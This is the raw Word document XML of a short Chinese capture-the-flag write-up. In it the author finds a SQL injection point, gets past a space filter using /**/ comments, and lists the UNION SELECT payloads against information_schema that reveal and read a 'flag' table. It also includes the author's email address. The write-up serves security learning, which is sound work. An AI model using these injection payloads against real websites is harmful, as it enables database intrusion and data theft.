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BCB2" w14:textId="77777777" w:rsidR="00D20196" w:rsidRDefault="00D20196" w:rsidP="00D20196">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738AB547" w14:textId="77777777" w:rsidR="00D20196" w:rsidRDefault="00D20196" w:rsidP="00D20196">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/*                程序作者：爱的伊苏                        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5962F9" w14:textId="77777777" w:rsidR="00D20196" w:rsidRDefault="00D20196" w:rsidP="00D20196">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/*                程序完成时间：2019/1/5                    */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36BFCD" w14:textId="77777777" w:rsidR="00D20196" w:rsidRDefault="00D20196" w:rsidP="00D20196">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/*                有任何问题请联系：740531307@qq.com        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1268F10B" w14:textId="77777777" w:rsidR="00D20196" w:rsidRDefault="00D20196" w:rsidP="00D20196">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF3F71B" w14:textId="77777777" w:rsidR="00D20196" w:rsidRDefault="00D20196" w:rsidP="00D20196">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//@永远得意的笑下去</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="505BA4EB" w14:textId="77777777" w:rsidR="00D20196" w:rsidRDefault="00D20196" w:rsidP="00D20196">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8F9752" w14:textId="5E256875" w:rsidR="00E474C9" w:rsidRDefault="00D20196">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="279C1E4E" wp14:editId="2B435521">
            <wp:extent cx="2324301" cy="18213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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD54A3B" w14:textId="5C253522" w:rsidR="00D20196" w:rsidRDefault="00D20196">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A6D1872" wp14:editId="464FCF90">
            <wp:extent cx="2979678" cy="1714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1‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A743105" w14:textId="349EC3E9" w:rsidR="00D20196" w:rsidRDefault="00D20196">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>断定可能会存在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注入点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE83BB" w14:textId="647C8D63" w:rsidR="00D20196" w:rsidRDefault="00D20196">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="517511F4" wp14:editId="133E9F93">
            <wp:extent cx="2248095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7A4" w14:textId="77867713" w:rsidR="00D20196" w:rsidRDefault="00D20196">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在1</w:t>
      </w:r>
      <w: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之间加入空格，发现被过滤，推测出又是空格过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9306EA" w14:textId="535954E8" w:rsidR="00D20196" w:rsidRDefault="00D20196">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>翻倍空格法实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B2C77" w14:textId="7ABBA254" w:rsidR="00D20196" w:rsidRDefault="00D20196">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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'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or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id=4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union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select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from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information_schema.tables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where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'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE8331" w14:textId="16FC669B" w:rsidR="00D20196" w:rsidRDefault="00D20196">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失败，尝试使用另外一种方法再次进行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0666B2" w14:textId="24258603" w:rsidR="00D20196" w:rsidRDefault="00D2019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'/**/or/**/id=4/**/union/**/select/**/table_name/**/from/**/information_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schema.tables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/**/where/**/'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92D683" w14:textId="2B7CC26C" w:rsidR="00D20196" w:rsidRDefault="00D20196"/>
    <w:p w14:paraId="6C3B6CBE" w14:textId="3887BB9F" w:rsidR="00D20196" w:rsidRDefault="00D201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359748" wp14:editId="41BF634D">
            <wp:extent cx="5274310" cy="32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9714" w14:textId="66515916" w:rsidR="00D20196" w:rsidRDefault="00D20196"/>
    <w:p w14:paraId="59D39235" w14:textId="2B45CF69" w:rsidR="00D20196" w:rsidRDefault="00D20196">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功找到目标位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228CB450" w14:textId="1DCA360E" w:rsidR="00D20196" w:rsidRDefault="00D20196" w:rsidP="00D2019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'/**/or/**/id=4/**/union/**/select/**/table_name/**/from/**/information_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schema.tables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/**/where/**/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3032A911" w14:textId="4BDF4BDB" w:rsidR="00D20196" w:rsidRDefault="00E06A3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找段位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506DEE12" w14:textId="79487C1C" w:rsidR="00E06A3E" w:rsidRDefault="00E06A3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28ED5BA6" wp14:editId="209117BD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5D4" w14:textId="1A3E4990" w:rsidR="00E06A3E" w:rsidRDefault="00E06A3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现只有一个flag，直接查找</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F84D7E6" w14:textId="2235C222" w:rsidR="00E06A3E" w:rsidRDefault="00E06A3E" w:rsidP="00E06A3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'/**/or/**/id=4/**/union/**/select/**/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flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/**/from/**/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/**/where/**/'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E56B5B0" w14:textId="3EC88DF9" w:rsidR="00E06A3E" w:rsidRDefault="00E06A3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CACE5AD" wp14:editId="478E726D">
            <wp:extent cx="5274310" cy="1480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326" w14:textId="42C524E1" w:rsidR="00E06A3E" w:rsidRDefault="00E06A3E"/>
    <w:p w14:paraId="20249672" w14:textId="1EDE7686" w:rsidR="00E06A3E" w:rsidRDefault="00E06A3E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5775A541" w14:textId="57519FC1" w:rsidR="00E06A3E" w:rsidRDefault="00E06A3E"/>
    <w:p w14:paraId="716A9397" w14:textId="60CE8834" w:rsidR="00E06A3E" w:rsidRPr="00E06A3E" w:rsidRDefault="00E06A3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与第一问相比过滤的格式卢文伟发生了改变，但是都止步于空格过滤</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E06A3E" w:rsidRPr="00E0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1938D0"/>
    <w:rsid w:val="00AC1ED6"/>
    <w:rsid w:val="00D20196"/>
    <w:rsid w:val="00E06A3E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8EB5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{70ADAA61-9A0C-409D-9811-5D915105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2019-01-05T10:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-05T10:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>